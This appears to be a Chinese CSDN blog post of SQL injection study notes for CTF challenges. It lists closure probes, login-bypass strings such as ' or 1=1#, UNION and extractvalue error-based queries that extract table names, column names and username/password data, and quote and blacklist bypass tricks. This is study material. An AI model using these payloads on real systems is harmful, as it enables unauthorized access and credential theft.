sql 注入 ctf wiki

已于 2023-11-29 21:07:55 修改
阅读量439 收藏
点赞数
分类专栏: # web安全 文章标签: sql web安全 网络安全
于 2023-11-29 19:13:54 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41418557/article/details/134696601
版权

部分转载ctf-wiki

判闭合形式:

哪个报错就是哪种
1,1’,1’‘,1’±,1’'±(双引号带括号)

万能密码:

admin’ –
admin’ #
admin’/*
’ or 1=1–
’ or 1=1#
’ or 1=1/*
') or ‘1’='1–
') or (‘1’='1–

数据库名:

  1. SELECT database();
  2. SELECT schema_name FROM
    information_schema.schemata;
  3. extractvalue(1,concat(0x7e,database(),0x7e))

表名

union

  1. 数据库中的表:
    –MySQL 4版本时用version=9,MySQL 5版本时用version=10 UNION SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE
    version=10;

  2. 用户自定义的表 UNION SELECT TABLE_NAME FROM information_schema.tables WHERE
    TABLE_SCHEMA=database();

报错

  1. ExtractValue(1,CONCAT(0x5c,(SELECT table_name FROM
    information_schema.tables where table_schema=??)));

列名

union

  1. UNION SELECT GROUP_CONCAT(column_name) FROM
    information_schema.columns WHERE table_name = ‘tablename’

报错

  1. ExtractValue(1,concat(0x7e,(SELECT(GROUP_CONCAT(column_name))FROM(information_schema.columns)WHERE(table_name)like(‘tablename’))))

根据列名查询所在表

  1. 查询字段名为 username 的表
    SELECT table_name FROM information_schema.columns WHERE column_name = ‘username’;
  2. 查询字段名中包含 username 的表
    SELECT table_name FROM information_schema.columns WHERE column_name LIKE ‘%user%’;

查数据

union

  1. -1’ union select 1,2,group_concat(concat_ws(username,password)) from l0ve1ysq1#

报错

  1. extractvalue(1,concat(0x7e,(select(group_concat(concat_ws(username,right(password,20))))from(tablename))))

绕过引号限制

  1. – hex 编码
    SELECT * FROM Users WHERE username = 0x61646D696E
  2. – char() 函数
    SELECT * FROM Users WHERE username = CHAR(97, 100, 109, 105, 110)

绕过字符串黑名单

  1. SELECT ‘a’ ‘d’ ‘mi’ ‘n’;
  2. SELECT CONCAT(‘a’, ‘d’, ‘m’, ‘i’, ‘n’);
  3. SELECT CONCAT_WS(‘’, ‘a’, ‘d’, ‘m’, ‘i’, ‘n’);
  4. SELECT GROUP_CONCAT(‘a’, ‘d’, ‘m’, ‘i’, ‘n’);
_fairyland
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sql注入攻击流量情况
07-18
sql注入攻击流量情况
mysql&&sql注入+ctf+web安全
10-08
mysql&&sql注入+ctf+web安全
Web攻击之常见的SQL注入
BY_HEY的博客
03-19 2222
完成一个项目的过程中不仅要注意功能实现、性能测试,更要注意前端与后端之间通信的安全性。XSSSQL注入DDoSCSRF等,今天我们要介绍的是 SQL 注入提示:以下是本篇文章正文内容,下面案例可供参考。
SQL注入学习
Dk的博客
05-11 400
SQL 注入 Dk探索阶段,有哪里说的不对,我尽量改。。。 在晓得CTF已经有7个月了。。sql注入题都是sqlmap一把梭(一直咕咕咕,太羞耻了,终于要学一下手工注入了 手工简单注入大致流程 判断注入点 判断字段数 获取基本信息(数据库名称,表名,字段名) 0x01 bugku-成绩单 发现1'#正常返回,啥也没过滤,直接爆字段数,数据库名,表名,字段名 1' order by 4# //...
SQL注入之MYSQL注入总结-20240517更新mysql可报错注入函数
qq_39764475的博客
08-12 2085
简介 information_schema是用于存储数据库元数据的表,它保存了数据库名,表名,列名等信息。 让我们从爆破表名到了可以直接查询。 information_schema是MySQL5.0以上数据库独有,MYSQL4.X的没有,只能进行对库名、表名、列名暴力破解。 基本使用 基本语法 1.建立数据库 mysql> create database mysqltest; Query OK, 1 row affected (0.00 sec) 2.查询所有数据库 mysql> show d
Sql注入攻击介绍与防护
han_code的博客
05-12 1030
1、什么是sql注入 所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意)的SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。[1] 比如先前的很多影视网站泄露VI...
SQL注入漏洞演示源代码
07-15
SQL注入漏洞是网络安全领域中的一个重要话题,它涉及到数据库管理和Web应用程序的安全性。在这个"SQL注入漏洞演示源代码"中,我们可以深入理解这种攻击方式的工作原理,并学习如何防止它。 SQL注入是通过在输入字段...
ctf小经验sql注入
04-11
sql注入一、找到注入点; 二、判断当前表的字段; 三、用联合语句查看哪几位是有效位; 四、查看当前数据库中有哪些表; 五、查看表中有哪些属性;
sql注入工具sqlmap
06-16
sqlmap是一个自动化的sql注入渗透工具,指纹检测、注入方式、注入成功后的取数据等等都是自动化的,甚至还提供了一个字典来将取回来的hash爆破,是ctf sql注入题的必备帮手
PostgreSQL异常:An I/O error occurred while sending to the backend
IT后浪的博客
07-19 260
在使用PostgreSQL数据库批量写入数据的时候,遇到了一个问题,异常内容如下:Cause: org.postgresql.util.PSQLException: An I/O error occurred while sending to the backend.
SQL Server设置定时作业调度Schedule
Cachel Wood的博客
07-15 389
在“步骤”选项卡中,单击“新建”按钮,然后输入步骤的名称和描述。在“计划”选项卡中,单击“新建”按钮来创建一个新的计划。代理将在指定的时间和频率下运行作业,并执行您定义的。右键单击“作业”文件夹,然后选择“新建作业”。在“作业属性”对话框中,输入作业的名称和描述。代理的功能,可以用来设置定时作业。在“命令”文本框中,输入要定期执行的。现在,您已经成功设置了一个定时作业。连接到要设置定时作业的数据库实例。设置每天早上八点执行这个定时任务。在对象资源管理器中,展开“
SQL执行流程、SQL执行计划、SQL优化
最新发布
风中的默默
07-19 138
返回两个表中的匹配行。返回左表中的所有记录以及右表中的匹配记录。返回右表中的所有记录以及左表中的匹配记录。返回左侧或右侧表中有匹配的所有记录。
【MySQL】根据binlog日志获取回滚sql的一个开发思路
weixin_45385457的博客
07-19 227
不同客户端之间会交替追加在 binlog 中,需要通过 👆的 binlog 匹配流程来控制匹配。行,需要再次寻找 thread_id 相同的行,匹配到后执行上一个流程。在 binlog 中的线程 ID 记录为 thread_id。一个线程执行多个 sql 回滚到同一个文件可能带来的问题。对应 binlog 日志中的 thread_id=指定 mysql 客户端 开始时间和结束时间。打开 mysql 客户端 开始时间。关闭 mysql 客户端 结束时间。先匹配 thread_id 相同的。
SQL Server详细使用教程(包含启动SQL server服务、建立数据库、建表的详细操作) 非常适合初学者
hackeroink的博客
07-15 1051
本文主要详细介绍SQL server2019的简单使用,以《数据库系统概论(第5版)》的第79页—第80页为例,详细介绍如何使用SQL server2019这款数据库软件,包括启动SQL server服务,建立数据库(学生—课程模式S-T),建立课程表等,内容比较简单,容易理解,适合广大初学者了解SQL server的简单使用。不会涉及到复杂的语法知识,如果有也会详细解释的!下文标红的字请重点关注一下!本文的需要建表的数据如下:2.Course课程号Cno课程名Cname先行课Cpno学分。
PostgreSQL 中如何解决因大量并发插入导致的主键冲突?
技术笔记
07-16 978
在 PostgreSQL 中,解决因大量并发插入导致的主键冲突问题是一个重要的任务。我们可以通过使用唯一索引、序列、批量插入与事务处理、分区表和优化业务逻辑等方法来避免主键冲突的发生。这些方法各有优缺点,我们需要根据实际情况选择合适的解决方案。🎉相关推荐🍅关注博主🎗️带你畅游技术世界,不错过每一次成长机会!📚领书:PostgreSQL 入门到精通.pdf📙PostgreSQL 中文手册📘PostgreSQL 技术专栏🍅CSDN社区-墨松科技。
oceanbase架构、功能模块、数据存储、特性、sql流转层等概念详解
wangleshisei的博客
07-19 722
一般情况下,地域指的是 IDC 所在的城市。合并一般是由每个租户的 RS 根据写入状态或者用户设置发起调度,每个租户的每次合并都会选取一个全局的快照点,租户内所有的分区都会用这个快照点的数据做一次 Major Compaction,这样每次合并租户所有的数据都基于这个统一的快照点生成相应的 SSTable,通过这个机制不仅能帮助用户定期整合增量数据,提升读取性能,同时还提供了一个天然的数据校验点,通过全局的一致位点,OceanBase 数据库能够在内部对多副本以及主表索引表进行多维度的物理数据校验。
怎样在 PostgreSQL 中实现数据的异地备份?
技术笔记
07-19 853
总而言之,在 PostgreSQL 中实现数据的异地备份不是一件难事,但也需要我们认真对待,精心规划。选择合适的备份方法和异地存储方式,制定合理的备份策略,定期进行测试和恢复演练,才能确保我们的数据在任何情况下都能“安然无恙”。🎉相关推荐🍅关注博主🎗️带你畅游技术世界,不错过每一次成长机会!📚领书:PostgreSQL 入门到精通.pdf📙PostgreSQL 中文手册📘PostgreSQL 技术专栏🍅CSDN社区-墨松科技。
PostgreSQL的学习心得和知识总结(一百四十八)|查看 PostgreSQL 17 中的新内置排序规则提供程序
孤傲小二~阿沐的博客
07-15 756
查看 PostgreSQL 17 中的新内置排序规则提供程序
ctf sql注入题目
09-15
CTF(Capture The Flag)中的SQL注入题目提供了一个模拟真实情境下的网络安全挑战,旨在测试参与者对于SQL注入漏洞的理解和应用能力。以下是一些CTF SQL注入题目的例子: 1. BUUCTF-[极客大挑战 2019]EasySQL 这是...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值